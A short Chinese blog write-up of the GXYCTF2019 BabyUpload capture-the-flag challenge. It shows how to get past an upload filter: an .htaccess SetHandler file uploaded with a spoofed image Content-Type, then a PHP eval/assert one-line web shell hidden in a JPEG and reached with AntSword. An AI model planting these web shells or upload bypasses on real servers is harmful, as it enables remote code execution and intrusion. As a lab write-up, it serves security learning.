GXYCTF2019-BabyUpload

发表于2021-03-20更新于2021-03-20阅读次数

1. 上传 .htaccess文件

文件内容:

1
SetHandler application/x-httpd-php

修改上传的Content-type为imge/jpeg格式

上传成功,该目录下的其他类型文件均以php格式解析

2. 上传木马文件

经过测试,该页面对含有<?php进行过滤

所以jpeg文件中使用其他语句:

1
2
3
<script language='php'>eval($_POST['shell']);</script>
或者:
<script language='php'>assert($_REQUEST['shell'])</script>

文件上传成功

3. 蚁剑连接

连接地址:http://8cf9fb2c-2b87-4f94-b9e1-1722ad515408.node3.buuoj.cn/upload/5e5980c740b6a0c59d18ed06583da861/shell1.jpeg

密码:shell

get flag!!!